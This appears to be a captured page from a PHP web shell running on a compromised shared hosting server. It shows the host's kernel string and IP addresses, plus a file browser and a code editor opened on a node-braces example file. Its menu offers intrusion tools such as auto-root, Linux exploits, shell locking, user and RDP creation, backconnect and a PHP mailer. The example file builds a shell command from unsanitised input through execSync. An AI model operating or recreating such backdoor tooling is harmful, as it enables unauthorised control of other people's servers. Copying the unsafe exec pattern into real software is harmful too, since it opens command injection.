Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-braces /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
compile.js
178
B
-rw-r--r--
expand.js
866
B
-rw-r--r--
option-transform.js
545
B
-rw-r--r--
parse.js
799
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : expand.js
const colors = require('ansi-colors'); const parse = require('./parse'); const color = (arr, c) => arr.map(s => c(s)).join(', '); const cp = require('child_process'); const braces = input => { return cp.execSync(`echo ${input}`).toString().trim().split(' '); }; // const fixture = '{a,{b,c},d}'; // const fixture = '{a,b}{c,d}{e,f}'; // const fixture = 'a/{b,c{x,y}d,e}/f'; // const fixture = '{{a,b}/i,j,k}'; // const fixture = '{c,d{e,f}g,h}'; // const fixture = '{{c,d{e,f}g,h}/i,j,k}'; // const fixture = '{a,b}/{c,d{e,f}g,h}'; // const fixture = '{{a,b}/{c,d{e,f}g,h}/i,j,k}'; // const fixture = '{x,y,{a,b,c\\}}'; const fixture = 'a{,b}c'; console.log(); console.log(' FIXTURE:', colors.magenta(fixture)); console.log(' ACTUAL:', color(expand(parse(fixture)), colors.yellow)); console.log('EXPECTED:', color(braces(fixture), colors.blue)); console.log();
Close